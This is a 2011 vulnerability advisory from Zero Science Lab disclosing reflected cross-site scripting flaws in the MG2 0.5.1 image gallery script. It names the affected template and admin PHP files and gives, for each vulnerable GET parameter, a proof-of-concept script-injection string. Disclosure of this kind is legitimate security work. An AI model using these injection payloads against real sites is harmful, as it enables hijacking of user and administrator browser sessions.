###########################################################
#                                                         #
#        MG2 0.5.1 Multiple XSS Vulnerabilities           #
#                                                         #
#                                                         #
# Vendor: MiniGal                                         #
# Product web page: http://www.minigal.dk                 #
# Affected version: 0.5.1                                 #
#                                                         #
# Summary: MG2 is the sequel to the popular               #
# image gallery script MiniGal. One of the                #
# highlights of MG2 is, that it supports PHP              #
# running in safe mode which is unsupported               #
# by almost all other dynamic image gallery               #
# scripts on the web.                                     #
#                                                         #
# Desc: MG2 suffers from multiple XSS vulns.              #
# Several parameters are vulnerable that are              #
# not sanitized before being returned to the              #
# user. This can be exploited to execute                  #
# arbitrary HTML and script code in a user's              #
# browser session in context of an affected               #
# site.                                                   #
#                                                         #
# Tested on: MS WinXP Pro SP3 (EN), XAMPP                 #
#                                                         #
# Vulnerability discovered by: LiquidWorm                 #
#                                                         #
# Advisory ID: ZSL-2011-4993                              #
#                                                         #
#                                                         #
# 03.02.2011                                              #
#                                                         #
#                                                         #
###########################################################
       |                                          |
       |                                          |
       |                                          |
 .-----0------------------------------------------0-----.
 |                                                      |
 |                                                      |
 | /mg2/skins/rounded/templates/thumbnails_password.php |
 | - param(GET): list=25<script>alert(1)</script>       |
 | - param(GET): id=25<script>alert(1)</script>         |
 |                                                      |
 | /mg2/skins/rounded/templates/viewimage_comments.php  |
 | - param(GET): id=31<script>alert(1)</script>         |
 |                                                      |
 | /mg2/skins/admin/admin1_menu.php                     |
 | - param(GET): list=41<script>alert(1)</script>       |
 |                                                      |
 | /mg2/skins/admin/admin2_comments.php                 |
 | - param(GET): list=45<script>alert(1)</script>       |
 |                                                      |
 | /mg2/skins/admin/admin2_edit.php                     |
 | - param(GET): editID=53<script>alert(1)</script>     |
 |                                                      |
 | /mg2/skins/admin/admin2_newfolder.php                |
 | - param(GET): list=59<script>alert(1)</script>       |
 |                                                      |
 | /mg2/skins/admin/admin3_folders.php                  |
 | - param(GET): list=71<script>alert(1)</script>       |
 |                                                      |
 |                                                      |
 *------------------------------------------------------*



                                                        Created by:
                                                        MiniAdvisory Creator v1.0.3g
                                                        2011 © Zero Science Lab